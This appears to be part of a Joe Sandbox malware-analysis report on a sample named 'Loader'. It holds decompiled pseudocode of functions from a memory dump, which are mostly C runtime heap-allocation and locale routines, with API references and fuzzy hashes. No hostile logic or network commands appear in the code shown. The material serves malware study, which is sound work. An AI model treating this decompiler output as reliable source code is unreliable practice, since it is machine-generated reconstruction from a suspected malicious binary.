							_t35 = _t34 | 0xffffffff;
							__eflags = _t34 | 0xffffffff;
							L19:
							_pop(_t69);
							L20:
							return E00AE95ED(_t35, _t54, _v8 ^ _t75, _t67, _t68, _t69);
						}
						E00AE80AC(_t68);
						_t38 =  *(_t68 + 0x38);
						_t60 = _t54;
						_v48 = _t38;
						__eflags = _t38;
						if(__eflags != 0) {
							_v44 = _t60;
							 *0xb05148(_t68 + 0x40,  &_v44,  &_v43,  &_v56,  &_v40,  &_v8,  &_v52);
							_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 0x1c))))();
							__eflags = _t49;
							if(_t49 == 0) {
								L14:
								_t72 = _v52 -  &_v40;
								__eflags = _t72;
								if(_t72 == 0) {
									L16:
									_t34 =  &_v44;
									 *((char*)(_t68 + 0x3d)) = 1;
									__eflags = _v56 - _t34;
									if(_v56 == _t34) {
										goto L18;
									}
									L17:
									_t35 = _t54;
									goto L19;
								}
								_t34 = E00AF0327(_t54, _t68, _t72,  &_v40, 1, _t72,  *(_t68 + 0x4c));
								__eflags = _t72 - _t34;
								if(_t72 != _t34) {
									goto L18;
								}
								goto L16;
							}
							_t51 = _t49 - 1;
							__eflags = _t51;
							if(_t51 == 0) {
								goto L14;
							}
							_t34 = _t51;
							__eflags = _t34;
							if(__eflags != 0) {
								goto L18;
							}
							_push( *(_t68 + 0x4c));
							_push(_v44);
							L12:
							_t53 = E00AE7917(__eflags); // executed
							__eflags = _t53;
							if(_t53 == 0) {
								_t54 = _t54 | 0xffffffff;
							}
							goto L17;
						}
						_push( *(_t68 + 0x4c));
						_push(_t60);
						goto L12;
					}
					_t67 =  *(__ecx + 0x30);
					_t73 =  *_t67;
					_t34 = _t73 + _t56;
					__eflags = _t56 - _t34;
					if(_t56 >= _t34) {
						goto L5;
					}
					 *_t67 = _t73 - 1;
					_t67 =  *(__ecx + 0x20);
					_t74 =  *_t67;
					 *_t67 =  &(_t74[0]);
					 *_t74 = _t54;
					goto L17;
				}
				_t35 = 0;
				goto L20;
			}

0x00ae8235
0x00ae8235
0x00ae823b
0x00ae8242
0x00ae8246
0x00ae824a
0x00ae824f
0x00ae8258
0x00ae825b
0x00ae825c
0x00ae825e
0x00ae8260
0x00ae8284
0x00ae8284
0x00ae8288
0x00ae832b
0x00ae832b
0x00ae832b
0x00ae832e
0x00ae832e
0x00ae832f
0x00ae833c
0x00ae833c
0x00ae8290
0x00ae8295
0x00ae8298
0x00ae829a
0x00ae829d
0x00ae829f
0x00ae82a7
0x00ae82cd
0x00ae82d8
0x00ae82d8
0x00ae82db
0x00ae82fe
0x00ae8304
0x00ae8304
0x00ae8306
0x00ae831b
0x00ae831b
0x00ae831e
0x00ae8322
0x00ae8325
0x00000000
0x00000000
0x00ae8327
0x00ae8327
0x00000000
0x00ae8327
0x00ae830f
0x00ae8317
0x00ae8319
0x00000000
0x00000000
0x00000000
0x00ae8319
0x00ae82dd
0x00ae82dd
0x00ae82e0
0x00000000
0x00000000
0x00ae82e3
0x00ae82e3
0x00ae82e6
0x00000000
0x00000000
0x00ae82e8
0x00ae82eb
0x00ae82ee
0x00ae82ee
0x00ae82f5
0x00ae82f7
0x00ae82f9
0x00ae82f9
0x00000000
0x00ae82f7
0x00ae82a1
0x00ae82a4
0x00000000
0x00ae82a4
0x00ae8262
0x00ae8265
0x00ae8267
0x00ae826a
0x00ae826c
0x00000000
0x00000000
0x00ae8271
0x00ae8273
0x00ae8276
0x00ae827b
0x00ae827d
0x00000000
0x00ae827d
0x00ae8251
0x00000000

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d0ce8f0f4649cac3fb4c7446619d6cf4777bd28fd9f26fd98ac92d75150a99
Instruction ID: dc434e06c84923a15a0b79ef708fa6ca1ac9c48354453de5e82020e2cfcd30c1
Opcode Fuzzy Hash: e2d0ce8f0f4649cac3fb4c7446619d6cf4777bd28fd9f26fd98ac92d75150a99
Instruction Fuzzy Hash: E131A43290055AEFCF15DF6AD9808EEB7B8BF09310B54025AE515A7680DB35F944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF639E Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00AF639E(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t31;
				intOrPtr* _t32;

				_t32 = _a4;
				if(E00AF6363(__eflags, _t32) == 0) {
					L11:
					__eflags = 0;
					return 0;
				}
				_t14 = E00AEF2F6(1);
				_t23 = 2;
				if(_t32 != _t14) {
					_t15 = E00AEF2F6(_t23);
					__eflags = _t32 - _t15;
					if(_t32 != _t15) {
						goto L11;
					}
					_t31 = 0xb38528;
					L5:
					 *0xb383a4 =  *0xb383a4 + 1;
					if(( *(_t32 + 0xc) & 0x000004c0) != 0) {
						goto L11;
					}
					asm("lock or [ecx], eax");
					_t18 =  *_t31;
					if(_t18 != 0) {
						L10:
						 *((intOrPtr*)(_t32 + 4)) = _t18;
						 *_t32 =  *_t31;
						 *((intOrPtr*)(_t32 + 8)) = 0x1000;
						 *((intOrPtr*)(_t32 + 0x18)) = 0x1000;
						L9:
						return 1;
					}
					_t21 = E00AF548F(0x1000); // executed
					 *_t31 = _t21;
					E00AF4AEF(0);
					_t18 =  *_t31;
					if(_t18 != 0) {
						goto L10;
					}
					_t30 = _t32 + 0x14;
					 *((intOrPtr*)(_t32 + 8)) = _t23;
					 *((intOrPtr*)(_t32 + 4)) = _t30;
					 *_t32 = _t30;
					 *((intOrPtr*)(_t32 + 0x18)) = _t23;
					goto L9;
				}
				_t31 = 0xb38524;
				goto L5;
			}

0x00af63a5
0x00af63b2
0x00af6443
0x00af6443
0x00000000
0x00af6443
0x00af63ba
0x00af63c2
0x00af63c5
0x00af63cf
0x00af63d5
0x00af63d7
0x00000000
0x00000000
0x00af63d9
0x00af63de
0x00af63de
0x00af63ef
0x00000000
0x00000000
0x00af63f6
0x00af63f9
0x00af63fd
0x00af642c
0x00af642c
0x00af6431
0x00af6433
0x00af643a
0x00af6428
0x00000000
0x00af6428
0x00af6404
0x00af640b
0x00af640d
0x00af6412
0x00af6418
0x00000000
0x00000000
0x00af641a
0x00af641d
0x00af6420
0x00af6423
0x00af6425
0x00000000
0x00af6425
0x00af63c7
0x00000000

APIs

_free.LIBCMT ref: 00AF640D

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9f7836f7b179a676852116b361fdc3299420b750cd6409fd0af3104d16efc0f7
Instruction ID: 4bea8593a116a6682b6f7f5cd4b49ccf070e0bbf80df9d3b51c3edb57ab34e66
Opcode Fuzzy Hash: 9f7836f7b179a676852116b361fdc3299420b750cd6409fd0af3104d16efc0f7
Instruction Fuzzy Hash: D81104361003099FD730AFA9D541BA2BBE4EF14755F30402DFA9A8B281EB71D9808B81

Uniqueness

Uniqueness Score: -1.00%

Function 00AFCF6B Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00AFCF6B(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00AF4A92(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00AF6C24(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00AF4AEF(0);
				return _t35;
			}

0x00afcf71
0x00afcf78
0x00afcf7d
0x00afcf81
0x00afcf88
0x00afcf8e
0x00afcf8e
0x00afcf94
0x00afcf96
0x00afcf99
0x00afcf99
0x00afcf9c
0x00afcf9e
0x00afcfa4
0x00afcfa8
0x00afcfad
0x00afcfb1
0x00afcfb5
0x00afcfb7
0x00afcfba
0x00afcfc0
0x00afcfc7
0x00afcfcb
0x00afcfce
0x00afcfd1
0x00afcfd1
0x00afcfd5
0x00afcfd8
0x00afcf8a
0x00afcf8a
0x00afcf8a
0x00afcfda
0x00afcfe5

APIs

Part of subcall function 00AF4A92: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AF49E2,00000001,00000364,00000005,000000FF,?,00AE9ED7,00000002,00000000,?,?), ref: 00AF4AD3

_free.LIBCMT ref: 00AFCFDA

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 2640524bfb4cc13e1091b122fc30e2a7ecec46b6145cd4da4e54ea00ee5eda87
Instruction ID: 8f2f53c2a736b12243803deaa04f7c874f330ef3c7f27aa44de9379c9780e416
Opcode Fuzzy Hash: 2640524bfb4cc13e1091b122fc30e2a7ecec46b6145cd4da4e54ea00ee5eda87
Instruction Fuzzy Hash: F401FE7260431E6BC3318FE5C8819AAFB98FB053B0F144619F656A75C0E770AD15C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00AF2059 Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00AF2059(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E00AF4A92(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E00AF4AEF(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E00AF1EDF(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}

0x00af206a
0x00af206c
0x00af2071
0x00af2073
0x00af2077
0x00af2079
0x00af2081
0x00af2083
0x00af208a
0x00af2090
0x00af2096
0x00af209c
0x00af20a4
0x00af20a7
0x00af20a8
0x00af20ab
0x00af20b1
0x00af20b5
0x00af20b9
0x00af20ba
0x00000000
0x00af20ba
0x00af20c2

APIs

Part of subcall function 00AF4A92: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AF49E2,00000001,00000364,00000005,000000FF,?,00AE9ED7,00000002,00000000,?,?), ref: 00AF4AD3

_free.LIBCMT ref: 00AF2079

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: aa2c298cee68212050240b9d5d50c1eeadd1c42832ede9aa7672ed7ed94b0605
Instruction ID: 09817d29c4097bd35ed3d62839358fd54918755b73e2a3bd01f4905d94d4e5b6
Opcode Fuzzy Hash: aa2c298cee68212050240b9d5d50c1eeadd1c42832ede9aa7672ed7ed94b0605
Instruction Fuzzy Hash: 13010CB6D00219AFCB10DFA9C441AEEBBB8FB48710F104526EA14E7244E774AA45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4A92 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AF4A92(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xb3890c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00AF3607();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00AEF21B(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00AF131C(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00af4a98
0x00af4a9d
0x00af4aab
0x00af4aab
0x00af4ab1
0x00af4ab3
0x00af4ab3
0x00af4aca
0x00af4ad3
0x00af4adb
0x00000000
0x00000000
0x00af4abb
0x00af4abd
0x00af4adf
0x00af4ae4
0x00af4aea
0x00000000
0x00af4aea
0x00af4ac6
0x00af4ac8
0x00000000
0x00000000
0x00af4ac8
0x00000000
0x00af4aca
0x00af4aa3
0x00af4aa9
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AF49E2,00000001,00000364,00000005,000000FF,?,00AE9ED7,00000002,00000000,?,?), ref: 00AF4AD3

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6646f3179cfe2687d580232961b7b497139aa42bfdd1f26d0ec64597d8c06d1f
Instruction ID: 39fb5d1fd0f0699a5ddec448e604d438c1e8a0fef1ee90ed5a9886fa02f78d21
Opcode Fuzzy Hash: 6646f3179cfe2687d580232961b7b497139aa42bfdd1f26d0ec64597d8c06d1f
Instruction Fuzzy Hash: E0F0E931684A2C6ADB21BBE69C01B7F3768DF457E0B188111FB04DB190DF30DC0086E9

Uniqueness

Uniqueness Score: -1.00%

Function 00AF548F Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AF548F(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00AEF21B(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb3890c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00AF3607();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00AF131C(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00af5495
0x00af549b
0x00af54cd
0x00af54d2
0x00af54d8
0x00000000
0x00af54d8
0x00af549f
0x00af54a1
0x00af54a1
0x00af54b8
0x00af54c1
0x00af54c9
0x00000000
0x00000000
0x00af54a9
0x00af54ab
0x00000000
0x00000000
0x00af54b4
0x00af54b6
0x00000000
0x00000000
0x00af54b6
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,00AE9ED7,00000002,00000000,?,?,?,00AE1D2E,00000001,00000004), ref: 00AF54C1

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8aa8b2e9cafc10326ae2e7c1d7a0e5bcb6bbadde226eaa24d219ec6ecc9c2d4f
Instruction ID: df811d063f86102e316c3352a75e1ed70c655e0eba3e53b023cd0cbae6acebe8
Opcode Fuzzy Hash: 8aa8b2e9cafc10326ae2e7c1d7a0e5bcb6bbadde226eaa24d219ec6ecc9c2d4f
Instruction Fuzzy Hash: 83E0E531A01F2C66DB2027F5AC04B7F3A5A9F823A3F250120FF4997091DF20CC8081E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AED2F1 Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AED2F1(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E00AF4AEF(_a4); // executed
				return _t5;
			}

0x00aed2fa
0x00aed304
0x00aed30b

APIs

_free.LIBCMT ref: 00AED304

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 1f84adca401fc2706bd29eb638b65538ae384b6cc164ea7fc7a21dd69748303b
Instruction ID: 3c611c8082636053e7b7b5bc4746aa5af9d1ecf9ed37ff664cca2f9483d82ed1
Opcode Fuzzy Hash: 1f84adca401fc2706bd29eb638b65538ae384b6cc164ea7fc7a21dd69748303b
Instruction Fuzzy Hash: 55C08C3100020CBBCB00EB82C906A4FBBA8DB803A4F200044F41017240DAB1EE009680

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AFE97D Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00AFE97D(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E00AF4840(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00AFE910(0xb0a8e0, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00AFE281(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00AFE3A1();
					} else {
						E00AFE308(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00AFE910(0xb0a5d0, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00AFE3A1();
							} else {
								E00AFE308(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00AFE7CD(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E00AFBB23(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00AED26C();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0xb36bac; // 0x85d5fe2b
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E00AF4840(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E00AF4840(_t97, _t114) + 0x34c);
								_t127 = E00AFF0B8(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00AFB834(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E00AFF1EA(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E00AE95ED(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E00AF6BA9(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E00AF6BA9(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E00B03FBB(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E00AF6BA9(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E00B03FBB(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E00B0294E(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E00AFBB23(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00afe982
0x00afe983
0x00afe985
0x00afe98a
0x00afe991
0x00afe993
0x00afe996
0x00afe996
0x00afe999
0x00afe999
0x00afe99f
0x00afe9a2
0x00afe9a5
0x00afe9a5
0x00afe9a8
0x00afe9ab
0x00afe9ad
0x00afe9b3
0x00afe9b5
0x00afe9ba
0x00afe9c4
0x00afe9c9
0x00afe9cb
0x00afe9ce
0x00afe9ce
0x00afe9d0
0x00afe9d4
0x00afea1d
0x00000000
0x00afe9d6
0x00afe9db
0x00afe9e4
0x00afe9dd
0x00afe9dd
0x00afe9dd
0x00afe9ef
0x00afe9f9
0x00afe9fe
0x00afea03
0x00afea09
0x00afea0d
0x00afea16
0x00afea0f
0x00afea0f
